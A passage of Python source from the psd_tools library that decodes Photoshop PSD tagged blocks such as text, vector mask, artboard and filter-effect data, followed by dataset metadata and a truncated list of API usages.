version)\n\n\n@register(TaggedBlock.TYPE_TOOL_OBJECT_SETTING)\ndef _decode_type_tool_object_setting(data, **kwargs):\n fp = io.BytesIO(data)\n ver, xx, xy, yx, yy, tx, ty, txt_ver, descr1_ver = read_fmt(\"H 6d H I\", fp)\n\n # This decoder needs to be updated if we have new formats.\n if ver != 1 or txt_ver != 50 or descr1_ver != 16:\n warnings.warn(\"Ignoring type setting tagged block due to old versions\")\n return data\n\n try:\n text_data = decode_descriptor(None, fp)\n except UnknownOSType as e:\n warnings.warn(\"Ignoring type setting tagged block (%s)\" % e)\n return data\n\n # Decode EngineData here.\n for index in range(len(text_data.items)):\n item = text_data.items[index]\n if item[0] == b'EngineData':\n text_data.items[index] = (b'EngineData', engine_data.decode(item[1].value))\n\n warp_ver, descr2_ver = read_fmt(\"H I\", fp)\n if warp_ver != 1 or descr2_ver != 16:\n 
warnings.warn(\"Ignoring type setting tagged block due to old versions\")\n return data\n\n try:\n warp_data = decode_descriptor(None, fp)\n except UnknownOSType as e:\n warnings.warn(\"Ignoring type setting tagged block (%s)\" % e)\n return data\n\n left, top, right, bottom = read_fmt(\"4i\", fp) # wrong info in specs...\n return TypeToolObjectSetting(\n ver, xx, xy, yx, yy, tx, ty, txt_ver, descr1_ver, text_data,\n warp_ver, descr2_ver, warp_data, left, top, right, bottom\n )\n\n\n@register(TaggedBlock.CONTENT_GENERATOR_EXTRA_DATA)\ndef _decode_content_generator_extra_data(data, **kwargs):\n return _decode_descriptor_block(data, ContentGeneratorExtraData)\n\n\n@register(TaggedBlock.TEXT_ENGINE_DATA)\ndef _decode_text_engine_data(data, **kwargs):\n return engine_data.decode(data)\n\n\n@register(TaggedBlock.UNICODE_PATH_NAME)\ndef _decode_unicode_path_name(data, **kwargs):\n if data:\n return _decode_descriptor_block(data, UnicodePathName)\n else:\n warnings.warn(\"Empty Unicode Path Name\")\n return None\n\n\n@register(TaggedBlock.ANIMATION_EFFECTS)\ndef _decode_animation_effects(data, **kwargs):\n return _decode_descriptor_block(data, AnimationEffects)\n\n\n@register(TaggedBlock.FILTER_MASK)\ndef _decode_filter_mask(data, **kwargs):\n fp = io.BytesIO(data)\n color = decode_color(fp)\n opacity = read_fmt(\"H\", fp)[0]\n return FilterMask(color, opacity)\n\n\n@register(TaggedBlock.VECTOR_ORIGINATION_DATA)\ndef _decode_vector_origination_data(data, **kwargs):\n fp = io.BytesIO(data)\n ver, descr_ver = read_fmt(\"II\", fp)\n\n if ver != 1 and descr_ver != 16:\n warnings.warn(\"Invalid vmsk version %s %s\" % (ver, descr_ver))\n return data\n\n try:\n vector_origination_data = decode_descriptor(None, fp)\n except UnknownOSType as e:\n warnings.warn(\"Ignoring vector origination tagged block (%s)\" % e)\n return data\n\n return VectorOriginationData(ver, descr_ver, vector_origination_data)\n\n\n@register(TaggedBlock.PIXEL_SOURCE_DATA1)\ndef _decode_pixel_source_data1(data, **kwargs):\n return _decode_descriptor_block(data, PixelSourceData)\n\n\n@register(TaggedBlock.PIXEL_SOURCE_DATA2)\ndef _decode_pixel_source_data2(data, **kwargs):\n fp = io.BytesIO(data)\n length = read_fmt(\"Q\", fp)\n return fp.read(length)\n\n\n@register(TaggedBlock.VECTOR_MASK_SETTING1)\n@register(TaggedBlock.VECTOR_MASK_SETTING2)\ndef _decode_vector_mask_setting1(data, **kwargs):\n fp = io.BytesIO(data)\n ver, flags = read_fmt(\"II\", fp)\n\n # This decoder needs to be updated if we have new formats.\n if ver != 3:\n warnings.warn(\"Ignoring vector mask setting1 tagged block due to \"\n \"unsupported version %s\" % (ver))\n return data\n\n path = decode_path_resource(fp.read())\n return VectorMaskSetting(\n ver, (0x01 & flags) > 0, (0x02 & flags) > 0, (0x04 & flags) > 0, path)\n\n\n@register(TaggedBlock.ARTBOARD_DATA1)\n@register(TaggedBlock.ARTBOARD_DATA2)\n@register(TaggedBlock.ARTBOARD_DATA3)\ndef _decode_artboard_data(data, **kwargs):\n return _decode_descriptor_block(data, ArtboardData)\n\n\n@register(TaggedBlock.PLACED_LAYER_OBSOLETE1)\n@register(TaggedBlock.PLACED_LAYER_OBSOLETE2)\ndef _decode_placed_layer(data, **kwargs):\n fp = io.BytesIO(data)\n type_, version = read_fmt(\"2I\", fp)\n if version != 3:\n warnings.warn(\"Unsupported placed layer version %s\" % (version))\n return data\n uuid = read_pascal_string(fp, \"ascii\")\n page, total_pages, anti_alias, layer_type = read_fmt(\"4I\", fp)\n transformation = read_fmt(\"8d\", fp)\n warp_version, warp_desc_version = read_fmt(\"2I\", fp)\n descriptor = 
decode_descriptor(None, fp)\n warp = WarpInformation(warp_version, warp_desc_version, descriptor)\n return PlacedLayerObsolete(type_, version, uuid, page, total_pages,\n anti_alias, layer_type, transformation, warp)\n\n\n@register(TaggedBlock.LINKED_LAYER1)\n@register(TaggedBlock.LINKED_LAYER2)\n@register(TaggedBlock.LINKED_LAYER3)\n@register(TaggedBlock.LINKED_LAYER_EXTERNAL)\ndef _decode_linked_layer(data, **kwargs):\n from psd_tools.decoder.linked_layer import decode\n return decode(data)\n\n\n@register(TaggedBlock.CHANNEL_BLENDING_RESTRICTIONS_SETTING)\ndef _decode_channel_blending_restrictions_setting(data, **kwargs):\n # Data contains color channels to restrict.\n restrictions = [False, False, False]\n fp = io.BytesIO(data)\n while fp.tell() < len(data):\n channel = read_fmt(\"I\", fp)[0]\n restrictions[channel] = True\n return restrictions\n\n\n@register(TaggedBlock.USER_MASK)\ndef _decode_user_mask(data, **kwargs):\n fp = io.BytesIO(data)\n color = decode_color(fp)\n opacity, flag = read_fmt(\"H B\", fp)\n return UserMask(color, opacity, flag)\n\n\n@register(TaggedBlock.FILTER_EFFECTS1)\n@register(TaggedBlock.FILTER_EFFECTS2)\n@register(TaggedBlock.FILTER_EFFECTS3)\ndef _decode_filter_effects(data, **kwargs):\n fp = io.BytesIO(data)\n version, length = read_fmt(\"I Q\", fp)\n if version not in (1, 2, 3):\n warnings.warn(\"Unknown filter effects version %d\" % version)\n return data\n\n return _decode_filter_effect_item(fp.read(length))\n\n\ndef _decode_filter_effect_item(data):\n fp = io.BytesIO(data)\n uuid = read_pascal_string(fp, \"ascii\")\n version, length = read_fmt(\"I Q\", fp)\n assert version == 1, \"Unknown filter effect version %d\" % version\n\n rectangle = read_fmt(\"4i\", fp)\n depth, max_channels = read_fmt(\"2I\", fp)\n\n channels = []\n for i in range(max_channels + 2):\n is_written = read_fmt(\"I\", fp)[0]\n assert is_written in (0, 1)\n if is_written:\n channel_len, compression = read_fmt(\"Q H\", fp)\n channel_data = fp.read(max(0, channel_len - 2))\n channels.append(FilterEffectChannel(is_written, compression,\n RawData(channel_data)))\n else:\n channels.append(FilterEffectChannel(is_written, 0, None))\n\n # There seems to be undocumented extra fields.\n extra_data = None\n if len(data) > fp.tell() and read_fmt(\"B\", fp)[0]:\n extra_rect = read_fmt(\"4i\", fp)\n extra_length, extra_compression = read_fmt(\"Q H\", fp)\n extra_data = (extra_rect, extra_compression,\n RawData(fp.read(extra_length)))\n\n return FilterEffects(uuid, version, rectangle, depth, max_channels,\n channels, extra_data)\n", "sub_path": "src/psd_tools/decoder/tagged_blocks.py", "file_name": "tagged_blocks.py", "file_ext": "py", "file_size_in_byte": 29581, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "psd_tools.decoder.decoders.new_registry", "line_number": 19, "usage_type": "call"}, {"api_name": "psd_tools.decoder.decoders", "line_number": 19, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.BLEND_CLIPPING_ELEMENTS", "line_number": 22, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 22, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.BLEND_INTERIOR_ELEMENTS", "line_number": 23, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 23, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.BLEND_FILL_OPACITY", "line_number": 24, "usage_type": "attribute"}, {"api_name": 
"psd_tools.constants.TaggedBlock", "line_number": 24, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.KNOCKOUT_SETTING", "line_number": 25, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 25, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.UNICODE_LAYER_NAME", "line_number": 26, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 26, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.LAYER_ID", "line_number": 27, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 27, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.EFFECTS_LAYER", "line_number": 28, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 28, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.OBJECT_BASED_EFFECTS_LAYER_INFO", "line_number": 29, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 29, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.OBJECT_BASED_EFFECTS_LAYER_INFO_V0", "line_number": 30, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 30, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.OBJECT_BASED_EFFECTS_LAYER_INFO_V1", "line_number": 31, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 31, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.USING_ALIGNED_RENDERING", "line_number": 32, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 32, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.LAYER_VERSION", "line_number": 33, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 33, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.TRANSPARENCY_SHAPES_LAYER", "line_number": 34, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 34, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.LAYER_MASK_AS_GLOBAL_MASK", "line_number": 35, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 35, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.VECTOR_MASK_AS_GLOBAL_MASK", "line_number": 36, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 36, "usage_type": "name"}, {"api_name": "psd_tools.decoder.decoders.boolean", "line_number": 22, "usage_type": "call"}, {"api_name": "psd_tools.decoder.decoders", "line_number": 22, "usage_type": "name"}, {"api_name": "psd_tools.decoder.decoders.boolean", "line_number": 23, "usage_type": "call"}, {"api_name": "psd_tools.decoder.decoders", "line_number": 23, "usage_type": "name"}, {"api_name": "psd_tools.decoder.decoders.single_value", "line_number": 24, "usage_type": "call"}, {"api_name": "psd_tools.decoder.decoders", "line_number": 24, "usage_type": "name"}, {"api_name": "psd_tools.decoder.decoders.boolean", "line_number": 25, "usage_type": "call"}, {"api_name": "psd_tools.decoder.decoders", "line_number": 25, "usage_type": "name"}, {"api_name": "psd_tools.decoder.decoders.unicode_string", "line_number": 26, "usage_type": "attribute"}, {"api_name": "psd_tools.decoder.decoders", "line_number": 26, "usage_type": "name"}, {"api_name": "psd_tools.decoder.decoders.single_value", "line_number": 
27, "usage_type": "call"}, {"api_name": "psd_tools.decoder.decoders", "line_number": 27, "usage_type": "name"}, {"api_name": "psd_tools.decoder.layer_effects.decode", "line_number": 28, "usage_type": "attribute"}, {"api_name": "psd_tools.decoder.layer_effects", "line_number": 28, "usage_type": "name"}, {"api_name": "psd_tools.decoder.layer_effects.decode_object_based", "line_number": 29, "usage_type": "attribute"}, {"api_name": "psd_tools.decoder.layer_effects", "line_number": 29, "usage_type": "name"}, {"api_name": "psd_tools.decoder.layer_effects.decode_object_based", "line_number": 30, "usage_type": "attribute"}, {"api_name": "psd_tools.decoder.layer_effects", "line_number": 30, "usage_type": "name"}, {"api_name": "psd_tools.decoder.layer_effects.decode_object_based", "line_number": 31, "usage_type": "attribute"}, {"api_name": "psd_tools.decoder.layer_effects", "line_number": 31, "usage_type": "name"}, {"api_name": "psd_tools.decoder.decoders.boolean", "line_number": 32, "usage_type": "call"}, {"api_name": "psd_tools.decoder.decoders", "line_number": 32, "usage_type": "name"}, {"api_name": "psd_tools.decoder.decoders.single_value", "line_number": 33, "usage_type": "call"}, {"api_name": "psd_tools.decoder.decoders", "line_number": 33, "usage_type": "name"}, {"api_name": "psd_tools.decoder.decoders.single_value", "line_number": 34, "usage_type": "call"}, {"api_name": "psd_tools.decoder.decoders", "line_number": 34, "usage_type": "name"}, {"api_name": "psd_tools.decoder.decoders.single_value", "line_number": 35, "usage_type": "call"}, {"api_name": "psd_tools.decoder.decoders", "line_number": 35, "usage_type": "name"}, {"api_name": "psd_tools.decoder.decoders.single_value", "line_number": 36, "usage_type": "call"}, {"api_name": "psd_tools.decoder.decoders", "line_number": 36, "usage_type": "name"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 40, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 41, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 42, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 43, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 45, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 46, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 48, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 50, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 52, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 53, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 54, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 55, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 57, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 58, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 60, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 61, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 64, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 66, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 68, 
"usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 69, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 70, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 71, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 72, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 74, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 76, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 79, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 84, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 85, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 88, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 89, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 90, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 92, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 93, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 94, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 97, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 99, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 101, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 103, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 104, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 105, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 107, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 108, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 109, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 110, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 113, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 115, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 119, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 123, "usage_type": "call"}, {"api_name": "psd_tools.constants.SectionDivider.name_of", "line_number": 126, "usage_type": "call"}, {"api_name": "psd_tools.constants.SectionDivider", "line_number": 126, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.is_known", "line_number": 142, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 142, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 143, "usage_type": "call"}, {"api_name": "psd_tools.reader.layers.Block", "line_number": 146, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 151, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 152, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.decode_descriptor", "line_number": 155, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.UnknownOSType", 
"line_number": 156, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 157, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.SOLID_COLOR_SHEET_SETTING", "line_number": 161, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 161, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.PATTERN_FILL_SETTING", "line_number": 166, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 166, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.GRADIENT_FILL_SETTING", "line_number": 171, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 171, "usage_type": "name"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 178, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 178, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.BRIGHTNESS_AND_CONTRAST", "line_number": 176, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 176, "usage_type": "name"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 184, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 188, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 189, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 194, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 196, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 197, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.LEVELS", "line_number": 181, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 181, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 205, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 206, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 208, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 215, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 216, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 220, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 223, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 224, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.CURVES", "line_number": 203, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 203, "usage_type": "name"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 232, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 232, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.EXPOSURE", "line_number": 230, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 230, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.VIBRANCE", "line_number": 235, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 235, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 243, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 244, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 246, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 248, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 249, 
"usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 252, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 253, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.HUE_SATURATION_V4", "line_number": 240, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 240, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.HUE_SATURATION", "line_number": 241, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 241, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 262, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 263, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 264, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 265, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 266, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.COLOR_BALANCE", "line_number": 259, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 259, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.BLACK_AND_WHITE", "line_number": 270, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 270, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 277, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 278, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 280, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 283, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 288, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 289, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 290, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.PHOTO_FILTER", "line_number": 275, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 275, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 297, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 298, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 299, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.CHANNEL_MIXER", "line_number": 295, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 295, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 305, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 306, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.decode_descriptor", "line_number": 310, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.UnknownOSType", "line_number": 311, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 312, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.COLOR_LOOKUP", "line_number": 303, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 303, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.INVERT", "line_number": 316, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 316, "usage_type": "name"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 323, "usage_type": "call"}, {"api_name": "io.BytesIO", 
"line_number": 323, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.POSTERIZE", "line_number": 321, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 321, "usage_type": "name"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 328, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 328, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.THRESHOLD", "line_number": 326, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 326, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 333, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 334, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 336, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 338, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.SELECTIVE_COLOR", "line_number": 331, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 331, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 346, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 349, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.PATTERNS1", "line_number": 342, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 342, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.PATTERNS2", "line_number": 343, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 343, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.PATTERNS3", "line_number": 344, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 344, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 360, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 361, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 363, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 366, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_unicode_string", "line_number": 367, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_pascal_string", "line_number": 368, "usage_type": "call"}, {"api_name": "psd_tools.constants.ColorMode.INDEXED", "line_number": 370, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.ColorMode", "line_number": 370, "usage_type": "name"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 371, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 372, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 379, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 381, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 384, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 385, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 388, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 391, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 394, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 395, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 396, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.RawData", "line_number": 397, "usage_type": "call"}, 
{"api_name": "io.BytesIO", "line_number": 405, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 406, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 408, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_unicode_string", "line_number": 410, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 411, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 414, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 415, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 417, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 418, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 421, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 423, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 425, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 427, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 428, "usage_type": "call"}, {"api_name": 